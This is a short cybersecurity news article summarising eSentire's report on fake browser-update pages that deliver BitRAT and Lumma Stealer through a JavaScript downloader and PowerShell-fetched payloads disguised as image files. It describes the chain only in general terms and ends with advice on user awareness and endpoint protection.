Home
Cyber Risk Management

Malware Alert: BitRAT and Lumma Stealer Disguised in Fake Browser Updates

Discover how threat actors are leveraging fake browser updates to deploy BitRAT and Lumma Stealer malware, as eSentire’s Threat Response Unit (TRU) uncovers the intricacies of the infection chain and provides actionable insights to mitigate the risks posed by these sophisticated threats.

Arshiya Kunwar Arshiya Kunwar
June 4, 2024
  • Fake browser updates are being exploited as a delivery mechanism for BitRAT and Lumma Stealer malware, which eSentire’s Threat Response Unit (TRU) detected in May 2024.
  • The malware payloads, hidden within JavaScript code and disguised as .png files, are deployed through PowerShell scripts, highlighting the need for heightened user awareness and robust endpoint protection measures.

Fake browser updates have emerged as a prevalent method for delivering malware, as highlighted in a recent finding by eSentire’s Threat Response Unit (TRU). In May 2024, TRU uncovered instances of fake updates distributing BitRAT and Lumma Stealer, both notorious for their data-stealing capabilities.

The attack typically initiates when a user visits a compromised webpage containing malicious JavaScript code. This code redirects users to a fraudulent update page, urging them to download a Zip archive named ‘Update.zip’ from Discord’s Content Distribution Network (CDN). Within this archive lies a JavaScript file (Update.js) that is the initial downloader, fetching the payloads upon execution.

See more: EU Watchdog Enforces Accountability for AI Use in Banking

Upon executing Update.js, multiple PowerShell scripts are activated, hosted on a known BitRAT Command-and-Control (C2) address. These scripts facilitate the download and execution of subsequent payloads, masquerading as .png files with various functions, including loading, persistence, and actual payload delivery.

One such payload, BitRAT, boasts many features like remote desktop access and cryptocurrency mining. Lumma Stealer, the other detected payload, specializes in pilfering sensitive data such as cryptocurrency wallets and browser extensions, operating as a Malware-as-a-Service.

The utilization of fake updates as a delivery conduit underscores the necessity for user vigilance regarding the legitimacy of update prompts. Implementing robust endpoint protection tools and conducting security awareness training programs can mitigate such threats effectively.

MORE ON TECH

Cybersecurity
Arshiya Kunwar
Arshiya Kunwar

Arshiya Kunwar is an experienced tech writer with 8 years of experience. She specializes in demystifying emerging technologies like AI, cloud computing, data, digital transformation, and more. Her knack for making complex topics accessible has made her a go-to source for tech enthusiasts worldwide. With a passion for unraveling the latest tech trends and a talent for clear, concise communication, she brings a unique blend of expertise and accessibility to every piece she creates. Arshiya’s dedication to keeping her finger on the pulse of innovation ensures that her readers are always one step ahead in the constantly shifting technological landscape.
Take me to Community
Do you still have questions? Head over to the Spiceworks Community to find answers.

Recommended Reads

Top Tips to Stay Safe During Black Friday and Cyber Monday
Cyber Risk Management

Top Tips to Stay Safe During Black Friday and Cyber Monday

SMBs: Cybersecurity Is Everyone’s Responsibility
Cyber Risk Management

SMBs: Cybersecurity Is Everyone’s Responsibility

Cybersecurity Frameworks Explained
Cyber Risk Management

Cybersecurity Frameworks Explained

Why Transnational Cooperation Is Key in the Battle Against Cross-Border Cybercrime
Cyber Risk Management

Why Transnational Cooperation Is Key in the Battle Against Cross-Border Cybercrime

Safeguarding Elections from Cyberthreats
Cyber Risk Management

Safeguarding Elections from Cyberthreats

Fact or Fiction: Combatting Deepfakes During an Election Year
Cyber Risk Management

Fact or Fiction: Combatting Deepfakes During an Election Year